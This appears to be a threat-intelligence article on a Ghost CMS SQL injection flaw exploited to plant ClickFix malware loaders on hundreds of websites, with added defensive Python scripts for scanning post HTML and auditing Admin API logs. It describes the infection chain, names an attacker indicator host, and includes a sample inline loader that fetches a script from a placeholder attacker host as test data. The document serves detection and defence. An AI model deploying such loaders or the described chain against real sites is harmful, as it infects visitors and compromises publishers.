Ghost CMS Flaw Abused to Push ClickFix Attacks on Hundreds of Sites
Executive Summary
A critical SQL injection vulnerability in Ghost CMS—patched in February, but left unaddressed on hundreds of sites—is now fueling a large-scale ClickFix malware campaign… and it’s getting out of hand. Over 700 legitimate domains have been poisoned, including university portals and major technology brands. The attackers are exploiting the trust we place in legitimate publishers, and it’s a ruthless campaign.
What Happened
So, what’s going on here? In early May 2026, researchers at QiAnXin XLab uncovered a sweeping campaign targeting Ghost CMS installations that had never been updated to the February 2026 security patch. The attackers are using a playbook that’s simple, yet effective: find a vulnerable Ghost site, extract its administrative credentials, silently alter published content, and use that content to serve malware. And because the compromised domains include well-known universities like Harvard and Oxford, alongside companies like DuckDuckGo, the social-engineering lures benefit from the credibility of the host site. XLab describes the operation as a “large-scale poisoning” campaign involving at least two distinct threat clusters.
Technical Details
The root cause of all this is CVE-2026-26980, a SQL injection flaw in Ghost’s Content API discovered by security researchers. This vulnerability carries a CVSS score of 9.4 and affects Ghost CMS versions 3.24.0 through 6.19.0. It allows an unauthenticated remote attacker to read arbitrary data from the backend database, including the Admin API key. That key is the crown jewel: with it, an attacker gains full access to Ghost’s administrative API, enabling them to modify published articles.
The attackers abuse this capability to append a lightweight JavaScript loader to the bottom of compromised pages. The loader doesn’t contain the final payload… instead, it reaches out to attacker-controlled infrastructure (specifically clo4shara[.]xyz/11z77u3.php) to retrieve a second-stage cloaking script powered by Adspect, a commercial cloaking-as-a-service platform. Its job is to fingerprint every visitor: browser, geolocation, referrer, and whether the request appears to originate from a security scanner or a real human. Only visitors that meet the attacker’s targeting criteria are served the actual malicious content.
Those selected victims see a fake Cloudflare verification page inside an iframe that instructs them to prove they are human. This is the ClickFix trap. The page tells the user to press Windows+R, paste a Base64-encoded command, and press Enter… and that’s when the real damage happens. The command downloads a ZIP archive, extracts a batch script, and executes a PowerShell one-liner that fetches a DLL from a remote server, launches it with rundll32.exe, and opens a decoy webpage. Later iterations swapped the DLL for a JavaScript payload. Regardless of the delivery mechanism, the end goal is the same: drop and execute a Windows binary.
XLab observed multiple final payloads, including a code-signed PuTTY client and an Electron application named UtilifySetup.exe, a modified version of the open-source Grape desktop client. It establishes persistence and polls a command-and-control server at web-telegram[.].
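Because the loader is appended to stored article content, the same HTML that Ghost serves through its Content API can be scanned for it. The following scanner is an added example, not code from the original article or from the Ghost project: it collects every script element in a post, flags external script sources that are not on an allowlist of hosts the site legitimately embeds, and flags inline scripts that reach out to an off-allowlist URL or build script/iframe elements dynamically (the pattern a stage-loader uses). The sample posts, the allowlist and the hostname attacker-controlled.invalid are all constructed placeholders, and the post objects only mimic the slug and html fields of Content API output.

```python
"""Scan Ghost post HTML for injected <script> loaders (added example, offline)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^'\"\s)]+")
DYNAMIC_ELEMENT_RE = re.compile(r"createElement\(\s*['\"](script|iframe)['\"]")


class _ScriptCollector(HTMLParser):
    """Collect every <script> element: its src attribute (if any) and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def find_suspicious_scripts(post_html, allowed_hosts):
    """Return (kind, host) findings for scripts that do not belong in post content.

    kind is "external_script" for <script src=...> pointing off the allowlist, or
    "inline_loader" for an inline script that reaches an off-allowlist URL or
    creates script/iframe elements at runtime.
    """
    collector = _ScriptCollector()
    collector.feed(post_html)
    collector.close()
    findings = []
    for script in collector.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname or ""
            if host not in allowed_hosts:
                findings.append(("external_script", host or "relative"))
            continue
        body = script["body"]
        hosts = {urlparse(u).hostname or "" for u in URL_RE.findall(body)}
        unexpected = sorted(h for h in hosts if h not in allowed_hosts)
        if unexpected:
            findings.extend(("inline_loader", h) for h in unexpected)
        elif DYNAMIC_ELEMENT_RE.search(body):
            findings.append(("inline_loader", "dynamic-element"))
    return findings


def scan_posts(posts, allowed_hosts):
    """Map post slug -> findings for every post that contains something suspicious."""
    report = {}
    for post in posts:
        findings = find_suspicious_scripts(post.get("html") or "", allowed_hosts)
        if findings:
            report[post["slug"]] = findings
    return report


# Constructed sample posts shaped like Content API `posts` objects (slug + html only).
# attacker-controlled.invalid is a placeholder host, not a real indicator.
ALLOWED_SCRIPT_HOSTS = {"platform.twitter.com"}
SAMPLE_POSTS = [
    {"slug": "welcome",
     "html": '<p>Hello</p><figure><iframe src="https://www.youtube.com/embed/abc"></iframe></figure>'},
    {"slug": "with-embed",
     "html": '<blockquote class="twitter-tweet">quoted</blockquote>'
             '<script async src="https://platform.twitter.com/widgets.js"></script>'},
    {"slug": "poisoned-article",
     "html": '<p>Real article text.</p>'
             '<script src="https://attacker-controlled.invalid/loader.js"></script>'},
    {"slug": "poisoned-inline",
     "html": "<p>More text.</p><script>var s=document.createElement('script');"
             "s.src='https://attacker-controlled.invalid/stage2.php';document.head.appendChild(s);</script>"},
]

if __name__ == "__main__":
    for slug, findings in scan_posts(SAMPLE_POSTS, ALLOWED_SCRIPT_HOSTS).items():
        print(slug, findings)
```

Run it against a dump of every post's html (for example the `posts` array returned by the Content API, or the html column exported from the database) with an allowlist of the embed hosts your authors actually use; any hit is content to remove and a reason to treat the Admin API key as stolen.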
Impact
Over 700 domains have been confirmed compromised, spanning personal blogs, technology sites, AI and SaaS platforms, media outlets, cryptocurrency projects, fintech firms, and educational institutions. Victims include household names in privacy, academia, and cybersecurity. The impact extends beyond site owners… every visitor to a poisoned article who falls for the fake CAPTCHA becomes a potential malware victim. Because the lure is served from a trusted domain, even security-conscious users may be caught off guard. The use of cloaking further complicates detection, as automated scanners often see only benign content. This campaign is a clear example of how a single vulnerability can have far-reaching consequences.
What To Do Now
For Ghost CMS administrators, the response must be immediate and thorough.
- Patch now: upgrade to Ghost CMS 6.19.1 or later without delay. The fix has been available since February; every day of delay is another day of exposure.
- Rotate credentials: all Admin API keys, secrets, and credentials that existed before patching must be considered compromised and rotated immediately.
- Clean house: injected scripts are embedded in articles at the database level. Administrators must inspect the database and published HTML to ensure all malicious code is removed.
- Audit logs: maintain at least 30 days of Admin API call logs and review them for unauthorized access patterns or unexpected key usage.
- Alert visitors: if your site was compromised, notify users who may have visited affected articles during the contamination window. They should scan their systems for signs of infection.
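The audit-log and alert-visitors steps above need a concrete way to find unauthorized Admin API key usage and to bound the contamination window. The script below is an added example, not from the article or from Ghost: it parses reverse-proxy access logs in the common "combined" format (constructed sample lines, with documentation-range IP addresses and placeholder post ids), keeps only successful write requests to the Admin API, and flags those coming from outside the networks your editors actually use. The Admin API path prefix `/ghost/api/admin/` is an assumption about the Ghost 5/6 URL layout; adjust it to match your installation, and point the trusted-network list at your real editor ranges.

```python
"""Flag Admin API writes from untrusted sources in access logs (added example, offline)."""
import ipaddress
import re
from datetime import datetime

ADMIN_API_PREFIX = "/ghost/api/admin/"   # assumed Ghost 5/6 Admin API path prefix
WRITE_METHODS = {"POST", "PUT", "DELETE"}

# nginx/Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format access log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def audit_admin_writes(lines, trusted_networks):
    """Return one alert per successful Admin API write from an IP outside trusted_networks."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(ADMIN_API_PREFIX):
            continue
        # Only writes that succeeded changed content; rejected requests (4xx) are skipped here
        if rec["method"] not in WRITE_METHODS or rec["status"] >= 400:
            continue
        ip = ipaddress.ip_address(rec["ip"])
        if any(ip in net for net in nets):
            continue
        alerts.append({
            "ip": rec["ip"],
            "when": rec["ts"].isoformat(),
            "request": f'{rec["method"]} {rec["path"]}',
            "user_agent": rec["ua"],
        })
    return alerts


def contamination_window(alerts):
    """Earliest and latest untrusted write, i.e. the window visitors should be warned about."""
    if not alerts:
        return None
    times = sorted(a["when"] for a in alerts)
    return times[0], times[-1]


# Constructed sample log lines: 10.0.0.5 is an editor on the office network,
# 203.0.113.10 is an unknown host using a scripted client, post ids are placeholders.
TRUSTED_NETWORKS = ["10.0.0.0/8"]
SAMPLE_LOG = [
    '10.0.0.5 - - [06/May/2026:09:30:11 +0000] "PUT /ghost/api/admin/posts/0123456789abcdef01234567/ HTTP/1.1" 200 5100 "https://blog.example/ghost/" "Mozilla/5.0 (editor laptop)"',
    '198.51.100.7 - - [07/May/2026:23:58:02 +0000] "GET /ghost/api/content/posts/?key=CONTENT_KEY_PLACEHOLDER HTTP/1.1" 200 8800 "-" "curl/8.4.0"',
    '203.0.113.10 - - [08/May/2026:02:14:07 +0000] "PUT /ghost/api/admin/posts/0123456789abcdef01234567/ HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '203.0.113.10 - - [08/May/2026:02:14:09 +0000] "PUT /ghost/api/admin/posts/89abcdef0123456789abcdef/ HTTP/1.1" 200 4990 "-" "python-requests/2.31"',
    '203.0.113.10 - - [08/May/2026:02:15:30 +0000] "POST /ghost/api/admin/session/ HTTP/1.1" 403 120 "-" "python-requests/2.31"',
    '10.0.0.5 - - [08/May/2026:10:02:44 +0000] "GET /ghost/api/admin/posts/ HTTP/1.1" 200 19000 "https://blog.example/ghost/" "Mozilla/5.0 (editor laptop)"',
]

if __name__ == "__main__":
    found = audit_admin_writes(SAMPLE_LOG, TRUSTED_NETWORKS)
    for alert in found:
        print(alert)
    print("contamination window:", contamination_window(found))
```

The source-IP check is deliberately simple; in practice also compare the user agent against what your editors' browsers send, and treat a write that lands seconds after an unusual Content API query as the stronger signal. The window returned by contamination_window is the earliest and latest untrusted write in the logs you still have, which is why the article's 30-day retention advice matters.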
Timeline
| Date | Event |
|---|---|
| February 16, 2026 | Ghost CMS v6.19.1 patch released. Malicious tooling compiled the same day. |
| February 19, 2026 | CVE-2026-26980 is publicly disclosed. |
| February 27, 2026 | SentinelOne publishes exploitation details and detection guidance. |
| Early May 2026 | First signs of large-scale exploitation activity appear. |
| May 7, 2026 | QiAnXin XLab first detects the active poisoning campaign. |
| May 24, 2026 | BleepingComputer reports on the campaign, confirming 700+ compromised domains. |
Sources
- BleepingComputer. “Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign.” May 24, 2026. https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/
- The Hacker News. “Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks.” May 25, 2026. https://thehackernews.com/2026/05/ghost-cms-cve-2026-26980-exploited-to.html
- Security Affairs. “Ghost CMS flaw abused to push ClickFix attacks on hundreds of sites.” May 25, 2026. https://securityaffairs.com/192655/cyber-crime/ghost-cms-flaw-abused-to-push-clickfix-attacks-on-hundreds-of-sites.html
- Ghost (TryGhost). “Ghost v6.19.1 Release.” February 16, 2026. https://github.com/TryGhost/Ghost/releases/tag/v6.19.1
- Ghost Community Forum.
A global syndicate of certified ethical hackers, threat analysts, and network security researchers collaborating to deliver real-time zero-day disclosures and CVE breakdowns.